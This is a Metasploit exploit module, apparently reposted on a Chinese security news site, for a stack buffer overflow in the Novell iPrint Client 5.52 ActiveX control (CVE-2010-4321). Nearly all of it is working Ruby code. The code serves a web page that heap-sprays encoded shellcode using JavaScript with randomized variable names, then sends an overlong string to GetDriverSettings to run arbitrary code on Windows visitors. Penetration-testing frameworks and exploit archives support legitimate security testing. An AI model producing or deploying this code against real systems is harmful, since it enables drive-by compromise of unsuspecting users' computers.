首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow (meta)
来源:http://www.metasploit.com 作者:mr_me 发布时间:2011-03-11  

##
# $Id: novelliprint_getdriversettings_2.rb 11888 2011-03-07 02:28:15Z bannedit $
##

###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super( update_info(info,
   'Name'           => 'Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow',
   'Description'    => %q{
     This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When
    sending an overly long string to the GetDriverSettings() property of ienipp.ocx
    an attacker may be able to execute arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'mr_me <steventhomasseeley[at]gmail.com>', # metasploit module
     'Dr_IDE' # original Exploit from exploit-db.com
     ],
   'Version'        => '$Revision: 11888 $',
   'References'     =>
    [
     [ 'CVE', '2010-4321' ],
     [ 'BID', '44966' ],
     [ 'OSVDB', '69357' ],
     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-256/' ],
     [ 'URL', 'http://www.exploit-db.com/exploits/16014/' ],
     [ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7007234' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'    => 1024,
     'BadChars' => "\x00",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7',
       {
        'Ret' => 0x0A0A0A0A
       }
     ]
    ],
   'DisclosureDate' => 'Nov 15 2010',
   'DefaultTarget'  => 0))
 end

 def autofilter
  false
 end

 def check_dependencies
  use_zlib
 end

 def on_request_uri(cli, request)
  # Re-generate the payload.
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode.
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Create some nops.
  nops = Rex::Text.to_unescape(make_nops(4))

  # Set the return.
  ret = Rex::Text.uri_encode([target.ret].pack('L'))

  # Randomize the javascript variable names.
  vname  = rand_text_alpha(rand(100) + 1)
  var_i  = rand_text_alpha(rand(30)  + 2)
  rand1  = rand_text_alpha(rand(100) + 1)
  rand2  = rand_text_alpha(rand(100) + 1)
  rand3  = rand_text_alpha(rand(100) + 1)
  rand4  = rand_text_alpha(rand(100) + 1)
  rand5  = rand_text_alpha(rand(100) + 1)
  rand6  = rand_text_alpha(rand(100) + 1)
  rand7  = rand_text_alpha(rand(100) + 1)
  rand8  = rand_text_alpha(rand(100) + 1)

  content = %Q|<html>
<object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x50000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 200; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 250; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.GetDriverSettings(#{rand8}, #{vname}, #{vname}, #{vname});
</script>
</html>
|
  content = Rex::Text.randomize_space(content)

  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the response to the client
  send_response_html(cli, content)

  # Handle the payload
  handler(cli)
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel < 2.6.37-rc2 TCP_
·Oracle MySQL for Microsoft Win
·Air Contacts Lite Denial Of Se
·QuickTime Player 7.5.x Buffer
·KMPlayer 2.9.3 (.avi) Stack bu
·FreeBSD <= 6.4 Netgraph Local
·Windows Movie Maker 2.1 (Impor
·maian weblog <= v4.0 remote bl
·KMPlayer 2.9.3.1 APE Buffer Ov
·Nokia N97 m3u Playlist Crash P
·Media Player Classic 6.4.9.1 B
·Movavi VideoSuite 8.0 Movie Ed
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved